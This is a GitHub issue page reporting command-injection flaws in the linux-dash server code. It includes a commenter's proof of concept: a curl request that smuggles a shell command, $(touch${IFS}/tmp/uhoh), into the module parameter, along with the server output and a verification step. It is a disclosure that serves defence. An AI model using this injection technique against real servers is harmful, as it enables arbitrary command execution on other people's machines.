Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

injection vulnerabilities #498

Open
jefimm opened this issue Sep 10, 2020 · 2 comments
Open

injection vulnerabilities #498

jefimm opened this issue Sep 10, 2020 · 2 comments

Comments

@jefimm
Copy link

jefimm commented Sep 10, 2020

https://github.com/afaqurk/linux-dash/blob/master/app/server/index.js#L76
and
https://github.com/afaqurk/linux-dash/blob/master/app/server/index.py#L30
are lacking escaping and are vulnerable to command injection
@calderonth
Copy link

How to exploit the Python server:
python index.py --port 8080

Trigger the command injection:

curl -v 'http://localhost:8080/server/?module=$(touch${IFS}/tmp/uhoh)' 
*   Trying 127.0.0.1:8080...
* TCP_NODELAY set
* Connected to localhost (127.0.0.1) port 8080 (#0)
> GET /server/?module=$(touch$IFS/tmp/uhoh) HTTP/1.1
> Host: localhost:8080
> User-Agent: curl/7.68.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
* HTTP 1.0, assume close after body
< HTTP/1.0 200 OK
< Server: BaseHTTP/0.3 Python/2.7.18
< Date: Tue, 20 Apr 2021 15:09:56 GMT
< Content-type: text/html
< 
{\"success\":false,\"status\":\"Invalid module\"}

Verify:

ls -ltr /tmp/uhoh                                         
-rw-rw-r-- 1 thomas thomas 0 Apr 20 16:09 /tmp/uhoh

@milansimek
Copy link

@tariqbuilds Maybe you should archive the project or put a warning in the readme as long as this isn't patched?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@jefimm @calderonth @milansimek